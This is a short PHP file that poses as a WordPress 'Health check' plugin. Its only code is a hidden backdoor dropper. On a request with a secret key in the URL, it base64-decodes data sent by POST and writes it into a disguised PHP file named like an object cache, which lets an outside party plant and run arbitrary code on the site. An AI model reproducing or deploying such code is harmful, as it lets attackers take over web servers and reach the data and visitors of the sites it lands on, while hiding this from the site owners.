<?php
/*
Plugin Name: wp-hc-8ab2b8
Description: Health check
Version: 1.0.1
*/
if(isset($_GET['_nxd'])&&isset($_POST['d'])&&hash_equals('4c33e968c3525d067b2ae5d4',(string)$_GET['_nxd'])){
$p=__DIR__.'/objcache-598c3c.php';
if(@file_put_contents($p,base64_decode($_POST['d']))!==false){echo 'NXDROP_OK:'.$p;exit;}
echo 'NXDROP_FAIL';exit;}